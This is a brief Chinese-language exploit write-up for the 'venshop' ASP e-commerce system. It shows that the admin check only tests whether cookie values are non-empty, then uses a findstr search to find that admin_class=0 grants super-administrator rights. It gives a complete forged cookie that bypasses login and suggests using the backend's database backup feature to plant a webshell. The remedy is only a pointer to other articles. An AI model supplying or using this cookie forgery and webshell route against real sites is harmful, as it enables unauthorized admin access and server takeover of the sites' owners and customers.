判断管理员登陆状态
<%
if Request.Cookies("venshop")("admin_name")="" or Request.Cookies("venshop")("admin_pass")="" or Request.Cookies("venshop")("admin_class")="" then
Response.Cookies("venshop")("admin_name")=""
Response.Cookies("venshop")("admin_pass")=""
Response.Cookies("venshop")("admin_class")=""
response.redirect "ad_login.asp"
response.end
end if
%>
判断admin_class
C:Inetpubwwwroot>findstr /i /n /s "admin_class" *.asp
ad_admin.asp:29: rs("admin_class")=request("class1")
ad_admin.asp:43:rs("admin_class")=request("class")
ad_admin.asp:92:<option value="0"<%if rs("admin_class")=0 then response.write" s
elected"%>>总管理员</option>
ad_admin.asp:93:<option value="1"<%if rs("admin_class")=1 then response.write" s
elected"%>>产品管理</option>
ad_admin.asp:94:<option value="2"<%if rs("admin_class")=2 then response.write" s
elected"%>>订单管理</option></select></td>
........................
可以看出当admin_class=0的时候就是总管理员身份了。
伪造cookie如下
Themes=default; Count=lao=3; Countecho=lao=True; ASPSESSIONIDQAADRSRB=CDBDHEHCLJOIHFDAHLFHABIO; venshop=admin%5Fclass=0&admin%5Fpass=admin&admin%5Fname=admin
然后访问即可,后台有数据库备份可以拿webshell。

修复:cookies漏洞修复请见本站以前文献